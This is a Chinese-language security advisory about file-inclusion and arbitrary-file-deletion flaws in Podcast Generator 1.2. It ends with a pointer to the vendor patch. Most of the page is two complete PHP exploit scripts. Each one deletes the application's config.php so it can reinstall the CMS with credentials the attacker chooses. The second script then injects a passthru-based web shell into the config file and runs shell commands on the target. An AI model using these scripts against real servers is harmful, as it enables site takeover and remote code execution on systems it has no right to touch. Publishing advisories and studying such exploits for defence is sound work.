Podcast Generator多个模块文件包含和任意文件删除漏洞

发表评论 (0) 查看评论

受影响系统:

Alberto Betella Podcast Generator 1.2

不受影响系统:

Alberto Betella Podcast Generator 1.3

描述:

BUGTRAQ  ID: 34317,28038
CVE(CAN) ID: CVE-2009-1230,CVE-2008-1124,CVE-2008-1125

Podcast Generator是用PHP编写的免费播客发布脚本。

Podcast Generator的core/archive_cat.php、core/admin/itunescategories.php和core/admin/login.php页面没有正确地过滤对GLOBALS[absoluteurl]参数所传送的输入,core/themes.php页面没有正确地过滤对GLOBALS[theme_path]参数所传送的输入,这可能用于包含本地或外部资源的任意文件;此外core/admin/delete.php页面没有正确地过滤对file和ext"参数所传送的输入,可能导致删除任意文件。成功利用这些漏洞要求打开了register_globals。

<*来源:BlackHawk
  
  链接:http://secunia.com/advisories/35333/
        http://milw0rm.com/exploits/8860
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

<?php
#
# Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit
#
# by staker
# ————————————–
# mail: staker[at]hotmail[dot]it
# url: http://podcastgen.sourceforge.net
# ————————————–
#
# it works with register_globals=on
#  
# short explanation:
#
# —————————————-
# Podcast Generator contains one flaw that
# allows an attacker to re-install the cms
# because of unlink() in ‘delete.php’ file
# —————————————-
# Look at ‘/core/admin/delete.php’
# (removed author’s comments)
/*

<?php
if (isset($_REQUEST[‘absoluteurl’]) OR isset($_REQUEST[‘amilogged’]) OR isset($_REQUEST[‘theme_path’]))
{  exit; } <——– {1}

if ($amilogged != "true") { exit; } <——-{2}

    if (isset($_GET[‘file’]) AND $_GET[‘file’]!=NULL) {
    $file = $_GET[‘file’];
     $ext = $_GET[‘ext’];
    
    if (file_exists("$absoluteurl$upload_dir$file.$ext")) {
        unlink ("$upload_dir$file.$ext"); <——–{3}
        $PG_mainbody .="<p><b>$file.$ext</b> $L_deleted</p>";
    }

*/
#
# Explanation (code snippet above [points])
# ———————————————————————————–
# 1. blocks all ‘amilogged’ REQUEST variables,what about GLOBALS?,therefore useless!
# 2. if ‘amilogged’ isn’t true -> exit() function activated.
# 3. unlink() delete an existing file.
# ———————————————————————————–
#
# It’s possible to delete ‘config.php’ to re-install the cms. we need ‘amilogged’
# set to true. We can do it using a GLOBALS variable.
#
# admin/core/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php
#
# Various:
# ————————————————–
# They didn’t help me but i want to give a thanks to
# girex,skerno,Chaomel,XaDoS,Dante90 and Gianluka_95  
# ————————————————–
# Today is: 02 June 2009.
# Location: Italy,Turin.
# http://www.youtube.com/watch?v=dBc7mK5iAH0
# ————————————————–

error_reporting(E_STRICT ^ E_WARNING);

if ($argc < 2) start_usage();            

$host = $argv[1];
$path = $argv[2];

re_install();

function send_request($data)
{        
        global $host;
        
        if (!$sock = @fsockopen($host,80)) {
               die("connection refused..\n");
        }
        
        if (isset($data)) {
               fputs($sock,$data);
        }
              
        while (!feof($sock)) { $result .= fgets($sock); }          
        
        fclose($sock);
        return $result;
}

function remove_config()
{
        global $host,$path;
        
        $in_lex = "/{$path}/core/admin/delete.php?GLOBALS[amilogged]=true&file=../../config&ext=php";
        
        $config  = "GET {$in_lex} HTTP/1.1\r\n";
        $config .= "User-Agent: Lynx (textmode)\r\n";
        $config .= "Host: {$host}\r\n";
        $config .= "Connection: close\r\n\r\n";
        
        $lol = send_request($config);
        
        if (check_config() != FALSE) {
              die("register_globals=off, exploit failed!\n");
        }
        else {
             return true;
        }          
}

function re_install()
{
        global $host,$path;
      
        $binary = "username=staker&password=killingyourself&password2=killingyourself&setuplanguage=en";
        
        $config  = "POST {$path}/setup/index.php?step=5 HTTP/1.1\r\n";
        $config .= "User-Agent: Lynx (textmode)\r\n";
        $config .= "Host: {$host}\r\n";
        $config .= "Content-Type: application/x-www-form-urlencoded\r\n";
        $config .= "Content-Length: ".strlen($binary)."\r\n";
        $config .= "Connection: close\r\n\r\n";
        $config .= $binary;
        
        remove_config();
        $content = send_request($config);
        
        
        if (eregi(‘Creation of the configuration file’,$content)) {
             echo "[ re-installed successful\n";
             echo "[ username: staker\n[ password: killingyourself\n"; exit(0);
        }
        else {
             die("Exploit failed\n");
        }                
}
      

function check_config()
{
        global $host,$path;
        
        $config  = "GET /{$path}/config.php HTTP/1.1\r\n";
        $config .= "User-Agent: Lynx (textmode)\r\n";
        $config .= "Host: {$host}\r\n";
        $config .= "Connection: close\r\n\r\n";
        
        $content = send_request($config);
        
        if (ereg(‘HTTP/1.1 404 Not Found’,$content))  {
              return false;
        }      
        else {
              return true;            
        }
}

function start_usage()
{
         print "[*————————————————————————–*]\n".
               "[* Podcast Generator <= 1.2 unauthorized CMS Re-Installation Remote Exploit *]\n".
               "[*————————————————————————–*]\n".
               "[* Usage: php podcast_xpl.php [host] [path]                                 *]\n".
               "[* [host] host -> example: localhost                                        *]\n".
               "[* [path] path -> example: /podcast                                         *]\n".
               "[*————————————————————————–*]\n";
         die();      
}

#!/usr/bin/php -q -d short_open_tag=on
<?
echo "

Podcast Generator <= 1.1 Remote Code Execution

Vendor: http://podcastgen.sourceforge.net
Exploit Author: BlackHawk
Author’s Site: http://itablackhawk.altervista.org

Credits goes to RGod for the code
Thanks to Marija just for exist 🙂

";
if ($argc<4) {
echo "

Usage: php ".$argv[0]." host /path/ command

        Es: php ".$argv[0]." localhost / dir

";
die;
}
/*
Bugs explanation:

This app has tons of bugs, but because of his structure lot of them are useless.. but not them all!

Look at ‘core/admin/delete.php’ (i have omitted the author comments):

—————————

<?php
if (isset($_REQUEST[‘absoluteurl’]) OR isset($_REQUEST[‘amilogged’]) OR isset($_REQUEST[‘theme_path’])) { exit; }
if (isset($_GET[‘file’]) AND $_GET[‘file’]!=NULL) {
    $file = $_GET[‘file’];
    $ext = $_GET[‘ext’];
    if (file_exists("$absoluteurl$upload_dir$file.$ext")) {
        unlink ("$upload_dir$file.$ext");
        $PG_mainbody .="<p><b>$file.$ext</b> $L_deleted</p>";
    }

—————————

no check for admin rights, so now we can delete whatever file we want, with any exstension..

so let’s delete config.php and make a rfesh new installation with a password set by us!

the RCE is triggered in ‘core/admin/scriptconfig.php’, line 56:

—————————
// recent in home
$recent = $_POST[‘recent’];
if ($recent != "") {
    $max_recent = $recent;
}
—————————

no sanitize of the input and no quotes added when writting to the config file (so no need mq=off)
BlackHawk <hawkgotyou@gmail.com>
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);

function quick_dump($string)
{
  $result=”;$exa=”;$cont=0;
  for ($i=0; $i<=strlen($string)-1; $i++)
  {
   if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
   {$result.="  .";}
   else
   {$result.="  ".$string[$i];}
   if (strlen(dechex(ord($string[$i])))==2)
   {$exa.=" ".dechex(ord($string[$i]));}
   else
   {$exa.=" 0".dechex(ord($string[$i]));}
   $cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
  }
return $exa."\r\n".$result;
}
$proxy_regex = ‘(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)’;
function sendpacketii($packet)
{
  global $proxy, $host, $port, $html, $proxy_regex;
  if ($proxy==”) {
    $ock=fsockopen(gethostbyname($host),$port);
    if (!$ock) {
      echo ‘No response from ‘.$host.’:’.$port; die;
    }
  }
  else {
    $c = preg_match($proxy_regex,$proxy);
    if (!$c) {
      echo ‘Not a valid proxy…’;die;
    }
    $parts=explode(‘:’,$proxy);
    echo "Connecting to ".$parts[0].":".$parts[1]." proxy…\r\n";
    $ock=fsockopen($parts[0],$parts[1]);
    if (!$ock) {
      echo ‘No response from proxy…’;die;
    }
  }
  fputs($ock,$packet);
  if ($proxy==”) {
    $html=”;
    while (!feof($ock)) {
      $html.=fgets($ock);
    }
  }
  else {
    $html=”;
    while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
      $html.=fread($ock,1);
    }
  }
  fclose($ock);
}

$host=$argv[1];
$path=$argv[2];

$cmd="";
for ($i=3; $i<=$argc-1; $i++){
$cmd.=" ".$argv[$i];
}
$port=80;
$proxy="";

if (($path[0]<>’/’) or ($path[strlen($path)-1]<>’/’)) {echo ‘Error… check the path!’; die;}
if ($proxy==”) {$p=$path;} else {$p=’http://’.$host.’:’.$port.$path;}

echo "Step1 – Delete config.inc\r\n";
$packet ="GET ".$p."core/admin/delete.php?file=../../config&ext=php HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
sendpacketii($packet);

echo "Step2 – Creating new configuration\r\n";

$data="username=new_user_name&password=blackhawk&password2=blackhawk&setuplanguage=en";
$packet="POST ".$p."/setup/index.php?step=5 HTTP/1.0\r\n";
$packet.="Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

echo "Step3 – Logging in\r\n";
$data="user=new_user_name&password=blackhawk";
$packet="POST ".$p."?p=admin HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
$temp=explode("Set-Cookie: ",$html);
$temp2=explode(" ",$temp[1]);
$PHPid = $temp2[0];

echo "Step4 – Sending shell\r\n";
$data="streaming=yes&fbox=yes&cats=yes&newsinadmin=yes&strictfilename=yes&recent=5; if (isset(\$_GET[cmd])){if(get_magic_quotes_gpc()){\$_GET[cmd]=stripslashes(\$_GET[cmd]);}echo 666999;passthru(\$_GET[cmd]);echo 666999;}\$xyz=5&recentinfeed=All&selectdateformat=d-m-Y&scriptlanguage=en";
$packet="POST ".$p."?do=config&p=admin&action=change HTTP/1.0\r\n";
$packet.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, * /*\r\n";
$packet.="Accept-Language: it\r\n";
$packet.="Content-Type: application/x-www-form-urlencoded\r\n";
$packet.="Accept-Encoding: gzip, deflate\r\n";
$packet.="User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Cookie: $PHPid\r\n";
$packet.="Content-Length: ".strlen($data)."\r\n";
$packet.="Connection: Close\r\n";
$packet.="Cache-Control: no-cache\r\n\r\n";
$packet.=$data;
sendpacketii($packet);

echo "Step5 – Executing Command\r\n\r\n";
$packet ="GET ".$p."config.php?cmd=dir HTTP/1.0\r\n";
$packet.="Host: ".$host."\r\n";
$packet.="Connection: Close\r\n\r\n";
$packet.=$data;
sendpacketii($packet);
if (strstr($html,"666999"))
{
  echo "Exploit succeeded…\r\n";
  $temp=explode("666999",$html);
  die("\r\n".$temp[1]."\r\n");
}
?>

建议:

厂商补丁:

Alberto Betella
—————
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://podcastgen.sourceforge.net/download.php?lang=en

发表评论?

0 条评论。

发表评论